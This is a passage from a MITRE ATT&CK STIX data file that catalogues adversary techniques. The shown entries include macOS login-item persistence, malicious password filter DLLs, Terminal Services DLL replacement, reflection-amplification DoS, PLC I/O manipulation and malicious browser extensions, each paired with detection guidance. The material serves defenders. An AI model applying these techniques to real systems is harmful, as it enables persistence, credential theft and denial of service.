"https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Login Item", "description": "MacOS provides the option to list specific applications to run when a user logs in. These applications run under the logged in user's context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them (Citation: Adding Login Items). Users have direct control over login items installed using a shared file list which are also visible in System Preferences (Citation: Adding Login Items). These login items are stored in the user's ~/Library/Preferences/ directory in a plist file called com.apple.loginitems.plist (Citation: Methods of Mac Malware Persistence). Some of these applications can open visible dialogs to the user, but they don\u2019t all have to since there is an option to \u2018Hide\u2019 the window. If an adversary can register their own login item or modified an existing one, then they can use it to execute their code for a persistence mechanism each time the user logs in (Citation: Malware Persistence on OS X) (Citation: OSX.Dok Malware). The API method SMLoginItemSetEnabled can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1155) can do this as well (Citation: Adding Login Items).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "All the login items created via shared file lists are viewable by going to the Apple menu -> System Preferences -> Users & Groups -> Login items. This area (and the corresponding file locations) should be monitored and whitelisted for known good applications. Otherwise, Login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well (Citation: Adding Login Items). Monitor process execution resulting from login actions for unusual or unknown applications.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--36675cd3-fe00-454c-8516-aebecacbe9d9", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1162", "external_id": "T1162"}, {"source_name": "Adding Login Items", "description": "Apple. (2016, September 13). Adding Login Items. Retrieved July 11, 2017.", "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html"}, {"source_name": "Methods of Mac Malware Persistence", "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"}, {"source_name": "Malware Persistence on OS X", "description": "Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.", "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"}, {"source_name": "OSX.Dok Malware", "description": "Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017.", "url": "https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/564.html", "external_id": "CAPEC-564"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Network Trust Dependencies", "description": "Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--36aa137f-5166-41f8-b2f0-a4cfa1b4133e", "created": "2020-10-02T15:47:59.457Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1590/003", "external_id": "T1590.003"}, {"source_name": "Pentesting AD Forests", "description": "Garc\u00eda, C. (2019, April 3). Pentesting Active Directory Forests. Retrieved October 20, 2020.", "url": "https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-03-30T21:01:41.052Z", "name": "Reflection Amplification", "description": "Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.\n\nReflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018) In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_detection": "Detection of reflection amplification can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a reflection amplification DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Azure AD", "Office 365", "SaaS", "IaaS", "Linux", "macOS", "Google Workspace"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Availability"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01", "created": "2020-03-02T20:08:03.691Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1498/002", "external_id": "T1498.002"}, {"source_name": "Cloudflare ReflectionDoS May 2017", "description": "Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection (attacks). Retrieved April 23, 2019.", "url": "https://blog.cloudflare.com/reflections-on-reflections/"}, {"source_name": "Cloudflare DNSamplficationDoS", "description": "Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved April 23, 2019.", "url": "https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/"}, {"source_name": "Cloudflare NTPamplifciationDoS", "description": "Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved April 23, 2019.", "url": "https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/"}, {"source_name": "Arbor AnnualDoSreport Jan 2018", "description": "Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide Infrastructure Security Report. Retrieved April 22, 2019.", "url": "https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf"}, {"source_name": "Cloudflare Memcrashed Feb 2018", "description": "Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.", "url": "https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/"}, {"source_name": "Cisco DoSdetectNetflow", "description": "Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.", "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-13T17:57:03.589Z", "name": "Manipulate I/O Image", "description": "Adversaries may manipulate the I/O image of PLCs through various means to prevent them from functioning as expected. Methods of I/O image manipulation may include overriding the I/O table via direct memory manipulation or using the override function used for testing PLC programs. (Citation: Dr. Kelvin T. Erickson December 2010) During the scan cycle, a PLC reads the status of all inputs and stores them in an image table. (Citation: Nanjundaiah, Vaidyanath) The image table is the PLCs internal storage location where values of inputs/outputs for one scan are stored while it executes the user program. After the PLC has solved the entire logic program, it updates the output image table. The contents of this output image table are written to the corresponding output points in I/O Modules. \n\nOne of the unique characteristics of PLCs is their ability to override the status of a physical discrete input or to override the logic driving a physical output coil and force the output to a desired status.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "inhibit-response-function"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0835", "external_id": "T0835"}, {"source_name": "Dr. Kelvin T. Erickson December 2010", "description": "Dr. Kelvin T. Erickson 2010, December Programmable logic controller hardware Retrieved. 2018/03/29 ", "url": "https://www.isa.org/standards-and-publications/isa-publications/intech/2010/december/programmable-logic-controller-hardware/"}, {"source_name": "Nanjundaiah, Vaidyanath", "description": "Nanjundaiah, Vaidyanath Dr. Kelvin T. Erickson 2010, December Programmable logic controller hardware Retrieved. 2018/03/29 PLC Ladder Logic Basics Retrieved. 2021/10/11 ", "url": "https://www.ezautomation.net/industry-articles/plc-ladder-logic-basics.htm"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Password Filter DLL", "description": "Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. \n\nWindows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation. \n\nAdversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.(Citation: Carnal Ownage Password Filters Sept 2013)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Vincent Le Toux"], "x_mitre_detection": "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages) and correlate then investigate the DLL files these files reference.\n\nPassword filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42", "created": "2020-02-11T19:05:45.829Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1556/002", "external_id": "T1556.002"}, {"source_name": "Carnal Ownage Password Filters Sept 2013", "description": "Fuller, R. (2013, September 11). Stealing passwords every time they change. Retrieved November 21, 2017.", "url": "http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html"}, {"source_name": "Clymb3r Function Hook Passwords Sept 2013", "description": "Bialek, J. (2013, September 15). Intercepting Password Changes With Function Hooking. Retrieved November 21, 2017.", "url": "https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Terminal Services DLL", "description": "Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)\n\n[Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a \"generic\" process (ex: svchost.exe) load the service's DLL file, the location of which is stored in a Registry entry named ServiceDll.(Citation: Microsoft System Services Fundamentals) The termsrv.dll file, typically stored in `%SystemRoot%\\System32\\`, is the default ServiceDll value for Terminal Services in `HKLM\\System\\CurrentControlSet\\services\\TermService\\Parameters\\`.\n\nAdversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal termsrv.dll functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the termsrv.dll file or modifying the ServiceDll value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for changes to Registry keys associated with ServiceDll and other subkey values under HKLM\\System\\CurrentControlSet\\services\\TermService\\Parameters\\.\n\nMonitor unexpected changes and/or interactions with termsrv.dll, which is typically stored in %SystemRoot%\\System32\\.\n\nMonitor commands as well as processes and arguments for potential adversary actions to modify Registry values (ex: reg.exe) or modify/replace the legitimate termsrv.dll.\n\nMonitor module loads by the Terminal Services process (ex: svchost.exe -k termsvcs) for unexpected DLLs (the default is %SystemRoot%\\System32\\termsrv.dll, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8", "created": "2022-03-28T15:34:44.590Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1505/005", "external_id": "T1505.005"}, {"source_name": "James TermServ DLL", "description": "James. (2019, July 14). @James_inthe_box. Retrieved March 28, 2022.", "url": "https://twitter.com/james_inthe_box/status/1150495335812177920"}, {"source_name": "Microsoft System Services Fundamentals", "description": "Microsoft. (2018, February 17). Windows System Services Fundamentals. Retrieved March 28, 2022.", "url": "https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx"}, {"source_name": "Microsoft Remote Desktop Services", "description": "Microsoft. (2019, August 23). About Remote Desktop Services. Retrieved March 28, 2022.", "url": "https://docs.microsoft.com/windows/win32/termserv/about-terminal-services"}, {"source_name": "RDPWrap Github", "description": "Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M. Retrieved March 28, 2022.", "url": "https://github.com/stascorp/rdpwrap"}, {"source_name": "Windows OS Hub RDP", "description": "Windows OS Hub. (2021, November 10). How to Allow Multiple RDP Sessions in Windows 10 and 11?. Retrieved March 28, 2022.", "url": "http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-03-01T19:06:05.126Z", "name": "AppleScript", "description": "Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.\n\nScripts can be run from the command-line via osascript /path/to/script or osascript -e \"script here\". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript)\n\nAppleScripts do not need to call osascript to execute. However, they may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s\u00a0NSAppleScript\u00a0or\u00a0OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility.\n\nAdversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team) Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Phil Stokes, SentinelOne"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for execution of AppleScript through osascript and usage of the NSAppleScript and OSAScript APIs that may be related to other suspicious behavior occurring on the system. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_remote_support": false, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--37b11151-1776-4f8f-b328-30939fbf2ceb", "created": "2020-03-09T14:07:54.329Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1059/002", "external_id": "T1059.002"}, {"source_name": "Apple AppleScript", "description": "Apple. (2016, January 25). Introduction to AppleScript Language Guide. Retrieved March 28, 2020.", "url": "https://developer.apple.com/library/archive/documentation/AppleScript/Conceptual/AppleScriptLangGuide/introduction/ASLR_intro.html"}, {"source_name": "SentinelOne macOS Red Team", "description": "Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple APIs Without Building Binaries. Retrieved July 17, 2020.", "url": "https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/"}, {"source_name": "SentinelOne AppleScript", "description": "Phil Stokes. (2020, March 16). How Offensive Actors Use AppleScript For Attacking macOS. Retrieved July 17, 2020.", "url": "https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/"}, {"source_name": "Macro Malware Targets Macs", "description": "Yerko Grbic. (2017, February 14). Macro Malware Targets Macs. Retrieved July 8, 2017.", "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:03.783Z", "name": "Network Sniffing", "description": "Network sniffing is the practice of using a network interface on a computer system to monitor or capture information (Citation: Enterprise ATT&CK January 2018) regardless of whether it is the specified destination for the information. \n\nAn adversary may attempt to sniff the traffic to gain information about the target. This information can vary in the level of importance. Relatively unimportant information is general communications to and from machines. Relatively important information would be login information. User credentials may be sent over an unencrypted protocol, such as Telnet, that can be captured and obtained through network packet analysis. \n\nIn addition, ARP and Domain Name Service (DNS) poisoning can be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "x_mitre_data_sources": ["Process: Process Creation", "Command: Command Execution"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0842", "external_id": "T0842"}, {"source_name": "Enterprise ATT&CK January 2018", "description": "Enterprise ATT&CK 2018, January 11 Network Sniffing Retrieved. 2018/05/17 ", "url": "https://attack.mitre.org/wiki/Technique/T1040"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-18T23:22:37.874Z", "name": "Browser Extensions", "description": "Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)\n\nMalicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.\n\nPrevious to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)\n\nOnce the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension)\n\nThere have also been instances of botnets using a persistent backdoor through malicious Chrome extensions for [Command and Control](https://attack.mitre.org/tactics/TA0011).(Citation: Stantinko Botnet)(Citation: Chrome Extension C2 Malware) Adversaries may also use browser extensions to modify browser permissions and components, privacy settings, and other security controls for [Defense Evasion](https://attack.mitre.org/tactics/TA0005).(Citation: Browers FriarFox)(Citation: Browser Adrozek) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Chris Ross @xorrior", "Justin Warner, ICEBRG", "Manikantan Srinivasan, NEC Corporation India"], "x_mitre_deprecated": false, "x_mitre_detection": "Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.\n\nMonitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.\n\nOn macOS, monitor the command line for usage of the profiles tool, such as profiles install -type=configuration. Additionally, all installed extensions maintain a plist file in the /Library/Managed Preferences/username/ directory. Ensure all listed files are in alignment with approved extensions.(Citation: xorrior chrome extensions macOS)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8", "created": "2018-01-16T16:13:52.465Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1176", "external_id": "T1176"}, {"source_name": "Chrome Extension Crypto Miner", "description": "Brinkmann, M. (2017, September 19). First Chrome extension with JavaScript Crypto Miner detected. Retrieved November 16, 2017.", "url": "https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/"}, {"source_name": "xorrior chrome extensions macOS", "description": "Chris Ross. (2019, February 8). No Place Like Chrome. Retrieved April 27, 2021.", "url": "https://www.xorrior.com/No-Place-Like-Chrome/"}, {"source_name": "Chrome Extensions Definition", "description": "Chrome. (n.d.). What are Extensions?. Retrieved November 16, 2017.", "url": "https://developer.chrome.com/extensions"}, {"source_name": "ICEBRG Chrome Extensions", "description": "De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL BUSINESSES. Retrieved January 17, 2018.", "url": "https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses"}, {"source_name": "Malicious Chrome Extension Numbers", "description": "Jagpal, N., et al. (2015, August). Trends and Lessons from Three Years Fighting Malicious Extensions. Retrieved November 17, 2017.", "url": "https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf"}, {"source_name": "Chrome Extension C2 Malware", "description": "Kjaer, M. (2016, July 18). Malware in the browser: how you might get hacked by a Chrome extension. Retrieved November 22, 2017.", "url": "https://kjaer.io/extension-malware/"}, {"source_name": "Catch All Chrome Extension", "description": "Marinho, R. (n.d.). \"Catch-All\" Google Chrome Malicious Extension Steals All Posted Data. Retrieved November 16, 2017.", "url": "https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)"}, {"source_name": "Banker Google Chrome Extension Steals Creds", "description": "Marinho, R. (n.d.). (Banker(GoogleChromeExtension)).targeting. Retrieved November 18, 2017.", "url": 